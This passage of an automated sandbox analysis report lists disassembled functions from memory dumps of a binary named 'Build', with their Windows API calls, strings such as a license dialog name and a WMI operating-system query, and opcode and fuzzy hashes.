Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: e2645b1cab8f5cb1beacf155d0ff366315bb1930c475af57448724606fa79467
Instruction ID: 02d4e9f781228f77eeda0fc70c03cb8b58ba6a607253dc198803ad9e3ccb25a2
Opcode Fuzzy Hash: e2645b1cab8f5cb1beacf155d0ff366315bb1930c475af57448724606fa79467
Instruction Fuzzy Hash: 5E01D4326145096BDF14DF29DC05FEE7BA9EFC4328F08C224AE59D7254D634E8018680

Function 0093D0AB Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0093D0E1
GetNumberFormatW.KERNEL32(00000400,00000000,?,0096272C,?,?), ref: 0093D12A

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 4fbefaf70080c1245ad677cfcce4208332060b0bf6ac9ee0388b092524bfc497
Instruction ID: 31110f65ddd2279035b8b8c8ba7bd55376cb8e49c0b03de890e6cc19ef24aa19
Opcode Fuzzy Hash: 4fbefaf70080c1245ad677cfcce4208332060b0bf6ac9ee0388b092524bfc497
Instruction Fuzzy Hash: 72115B35224308ABD711DF65DC41FAA77BCEF48701F50842AF901E7291D670AA45DB65

Function 0092D076 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0092D0A7

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 682b5751e5043f0fbe89cb48148a37c6ed4c7f461a0074c8beda15d7ecb6ece6
Instruction ID: d2454694d85b37132e40b62a0360aaf8f8181a4cdc7b8dbbda447e82ee353211
Opcode Fuzzy Hash: 682b5751e5043f0fbe89cb48148a37c6ed4c7f461a0074c8beda15d7ecb6ece6
Instruction Fuzzy Hash: 26014B70918608CBDB24CF24EC81A9D77B1BB58304F20461DD91A973A1DBB4A949EB40

Function 00930244 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00930284

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

Part of subcall function 00933F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0092F801,00000000,00000000,?,00965070,?,0092F801,?,?,00000050,?), ref: 00933F64

_strlen.LIBCMT ref: 009302A5
SetDlgItemTextW.USER32(?,00962274,?), ref: 009302FE
GetWindowRect.USER32(?,?), ref: 00930334
GetClientRect.USER32(?,?), ref: 00930340
GetWindowLongW.USER32(?,000000F0), ref: 009303EB
GetWindowRect.USER32(?,?), ref: 0093041B
SetWindowTextW.USER32(?,?), ref: 0093044A
GetSystemMetrics.USER32(00000008), ref: 00930452
GetWindow.USER32(?,00000005), ref: 0093045D
GetWindowRect.USER32(00000000,?), ref: 0093048D
GetWindow.USER32(00000000,00000002), ref: 009304FF

Strings

$%s:, xrefs: 0093026D
d, xrefs: 00930360
CAPTION, xrefs: 00930432

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 0dd56d10011e1fcadcdd4782b28e630d674bc825b28a6d0508493967e4182fb6
Instruction ID: 83091344d1848fc93dfaf977b4674364393c9d5c31acffdfdb19d88f7c07d3db
Opcode Fuzzy Hash: 0dd56d10011e1fcadcdd4782b28e630d674bc825b28a6d0508493967e4182fb6
Instruction Fuzzy Hash: CA815B72509301AFD714DFA8CD89B6FBBE9EBC8714F00092DFA8593290D774E9098B52

Function 0094F172 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0094F1B6

Part of subcall function 0094ED51: _free.LIBCMT ref: 0094ED6E
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094ED80
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094ED92
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDA4
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDB6
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDC8
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDDA
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDEC
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDFE
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE10
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE22
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE34
Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE46

_free.LIBCMT ref: 0094F1AB

Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22

_free.LIBCMT ref: 0094F1CD
_free.LIBCMT ref: 0094F1E2
_free.LIBCMT ref: 0094F1ED
_free.LIBCMT ref: 0094F20F
_free.LIBCMT ref: 0094F222
_free.LIBCMT ref: 0094F230
_free.LIBCMT ref: 0094F23B
_free.LIBCMT ref: 0094F273
_free.LIBCMT ref: 0094F27A
_free.LIBCMT ref: 0094F297
_free.LIBCMT ref: 0094F2AF

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 09e8831127c0369eda80e6713ab842711008dfa13e244951a451c67917cd31af
Instruction ID: 3971094a0702ccd1da2ec15b23816116861914608bbacda6346784712958fa5a
Opcode Fuzzy Hash: 09e8831127c0369eda80e6713ab842711008dfa13e244951a451c67917cd31af
Instruction Fuzzy Hash: C2316832A04602DFEB20EA79D845F9AB3E9FF84310F204529E55AD7591DFB1EC81CB20

Function 0093F9EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0093FA20
GetClassNameW.USER32(00000000,?,00000800), ref: 0093FA4C

Part of subcall function 00934168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0092E084,00000000,.exe,?,?,00000800,?,?,?,0093AD5D), ref: 0093417E

GetWindowLongW.USER32(00000000,000000F0), ref: 0093FA68
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0093FA7F
GetObjectW.GDI32(00000000,00000018,?), ref: 0093FA93
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0093FABC
DeleteObject.GDI32(00000000), ref: 0093FAC3
GetWindow.USER32(00000000,00000002), ref: 0093FACC

Strings

STATIC, xrefs: 0093FA52

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 549004e27e7e97944797e2331e6a7c5064d97f7151675f07c1b796c72e02f3d4
Instruction ID: 4d9c40d853c059313880fd37a35a48b32fe71649fe2a47b528343714d5c7ff05
Opcode Fuzzy Hash: 549004e27e7e97944797e2331e6a7c5064d97f7151675f07c1b796c72e02f3d4
Instruction Fuzzy Hash: E221467294C7107BE320ABB0CC4AFAFB79CAF98700F000425F955E6291EB74DD419BA1

Function 0094B8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0094B8C5

Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22

_free.LIBCMT ref: 0094B8D1
_free.LIBCMT ref: 0094B8DC
_free.LIBCMT ref: 0094B8E7
_free.LIBCMT ref: 0094B8F2
_free.LIBCMT ref: 0094B8FD
_free.LIBCMT ref: 0094B908
_free.LIBCMT ref: 0094B913
_free.LIBCMT ref: 0094B91E
_free.LIBCMT ref: 0094B92C

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a0147f901a7287f8a9404cd3469da7c83f06eeda5bf2bd876fb49e93a5b121ee
Instruction ID: d86e3c3fdc2a5f972697b5b596ed24405fd96cfcac7a5dc0643d53cdea94fdf6
Opcode Fuzzy Hash: a0147f901a7287f8a9404cd3469da7c83f06eeda5bf2bd876fb49e93a5b121ee
Instruction Fuzzy Hash: 4311B97A100148BFCB01EF59C992DD93BB9EF44350B0180A5FA094F622DB71EE52DB80

Function 00945451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00945570
___TypeMatch.LIBVCRUNTIME ref: 0094567E
_UnwindNestedFrames.LIBCMT ref: 009457D0
CallUnexpected.LIBVCRUNTIME ref: 009457EB
_abort.LIBCMT ref: 009457F0

Strings

csm, xrefs: 0094548E
csm, xrefs: 009455A7
csm, xrefs: 009454FB

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 63cc3c25c8d7536145c8135cc91f31a84666e700f21e2bff91164ea1458adacd
Instruction ID: 0cd616fd5335dc8793822204823a115302a0fe351fcd1af05532c0d7d027bb27
Opcode Fuzzy Hash: 63cc3c25c8d7536145c8135cc91f31a84666e700f21e2bff91164ea1458adacd
Instruction Fuzzy Hash: E0B14571800A09EFCF29DFE4C881EAEB7B9BF48314B164569E8056B213D735EA51CF91

Function 0093B631 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0093B656
_wcslen.LIBCMT ref: 0093B6F6
GlobalAlloc.KERNEL32(00000040,?), ref: 0093B705
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0093B726

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 0093B680
</html>, xrefs: 0093B6D7
utf-8"></head>, xrefs: 0093B68B
<html>, xrefs: 0093B675, 0093B6AE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: 997242688ce06a66d79ca5da20303b2fa01cde3505f7612f90cbea7fdcaa85be
Instruction ID: 910e039bf19c617caf731de07468c69f8d3270decf012e73f323f8954044daf6
Opcode Fuzzy Hash: 997242688ce06a66d79ca5da20303b2fa01cde3505f7612f90cbea7fdcaa85be
Instruction Fuzzy Hash: DF3126722183017BE725AB71AC47F6FB79CDFD1325F10011EFA01961D2FB6499488BA6

Function 0093D8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0

EndDialog.USER32(?,00000001), ref: 0093D910
SendMessageW.USER32(?,00000080,00000001,0004045F), ref: 0093D937
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0093D950
SetWindowTextW.USER32(?,?), ref: 0093D961
GetDlgItem.USER32(?,00000065), ref: 0093D96A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0093D97E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0093D994

Strings

LICENSEDLG, xrefs: 0093D8D4

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: e92f8901d259655e4fe68985209eb4e48ed532c5f36fe232da0aa48e70e7e2fe
Instruction ID: bdeebc2454eead28ce8e794c3e2968b7f0b300e3da3a17239eb35bb76e0d5655
Opcode Fuzzy Hash: e92f8901d259655e4fe68985209eb4e48ed532c5f36fe232da0aa48e70e7e2fe
Instruction Fuzzy Hash: 1621D13222E2047BD7115FA5FC5DF3B7B6CEB8AB81F114418F641A26A0CB62D901AB71

Function 0092BF89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092BFA3

Part of subcall function 009334D7: GetSystemTime.KERNEL32(?,00000000), ref: 009334EF
Part of subcall function 009334D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 009334FD

Part of subcall function 00933480: __aulldiv.LIBCMT ref: 00933489

__aulldiv.LIBCMT ref: 0092BFCF
GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 0092BFD6
_swprintf.LIBCMT ref: 0092C001

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

_wcslen.LIBCMT ref: 0092C00B
_swprintf.LIBCMT ref: 0092C061
_wcslen.LIBCMT ref: 0092C06B

Strings

%u.%03u, xrefs: 0092BFF1, 0092C055

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
String ID: %u.%03u
API String ID: 2956649372-1114938957
Opcode ID: 89edd704e79ac358b7590e81d865be59fe08af600488895449d686a7672d9dac
Instruction ID: 2573fd47c1938a3cbe59467dfe24a66ad08938049e075279dca20a1878ed8706
Opcode Fuzzy Hash: 89edd704e79ac358b7590e81d865be59fe08af600488895449d686a7672d9dac
Instruction Fuzzy Hash: 352150B2A083509FC614EF69DC86EAF77DCABC4750F444A1EF488D7251DA34D9088BA2

Function 0093CBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CBEE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0093CC05
SystemTimeToFileTime.KERNEL32(?,?), ref: 0093CC19
FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CC2A
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0093CC42
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0093CC66
_swprintf.LIBCMT ref: 0093CC85

Strings

%s %s, xrefs: 0093CC7C

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific_swprintf
String ID: %s %s
API String ID: 385609497-2939940506
Opcode ID: 11ec98d8e4a4663611a448b9c0c8c8560a6bba40263f96c2cf1717dfe2f1d77c
Instruction ID: b735e99d310b11e966f3b270602c7f891344c8d4a8c0164ece37f5a8fcf14511
Opcode Fuzzy Hash: 11ec98d8e4a4663611a448b9c0c8c8560a6bba40263f96c2cf1717dfe2f1d77c
Instruction Fuzzy Hash: 002127B290424CABDB20DFA5DD44EEE77BCEB49305F00456AFA0AD7052E630AA05CB60

Function 00942360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0092CEA9,0092CEAB,00000000,00000000,1C667296,00000001,00000000,00000000,?,0092CD87,?,00000004,0092CEA9,ROOT\CIMV2), ref: 009423E9
MultiByteToWideChar.KERNEL32(00000000,00000000,0092CEA9,?,00000000,00000000,?,?,0092CD87,?,00000004,0092CEA9), ref: 00942464
SysAllocString.OLEAUT32(00000000), ref: 0094246F
_com_issue_error.COMSUPP ref: 00942498
_com_issue_error.COMSUPP ref: 009424A2
GetLastError.KERNEL32(80070057,1C667296,00000001,00000000,00000000,?,0092CD87,?,00000004,0092CEA9,ROOT\CIMV2), ref: 009424A7
_com_issue_error.COMSUPP ref: 009424BA
GetLastError.KERNEL32(00000000,?,0092CD87,?,00000004,0092CEA9,ROOT\CIMV2), ref: 009424D0
_com_issue_error.COMSUPP ref: 009424E3

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: b1639f33e066bb8257d17512a57524233765de7750d7ae4f1c6c380b6e5e9856
Instruction ID: daab0ff501795f6611d3405d9236c204cbe8b32a42c70b8f1c80388f021898a3
Opcode Fuzzy Hash: b1639f33e066bb8257d17512a57524233765de7750d7ae4f1c6c380b6e5e9856
Instruction Fuzzy Hash: 98412871A04304ABDB10DFA9DC45FAEBBB8FB88721F504229F505E72A1DB349800CBA5

Function 0092CE64 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0092CE6B
VariantClear.OLEAUT32(?), ref: 0092D015

Strings

Windows 10, xrefs: 0092CFFB
Name, xrefs: 0092CFE9
ROOT\CIMV2, xrefs: 0092CE99
SELECT * FROM Win32_OperatingSystem, xrefs: 0092CF2C
WQL, xrefs: 0092CF3E

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ClearH_prolog3Variant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3629354427-3505469590
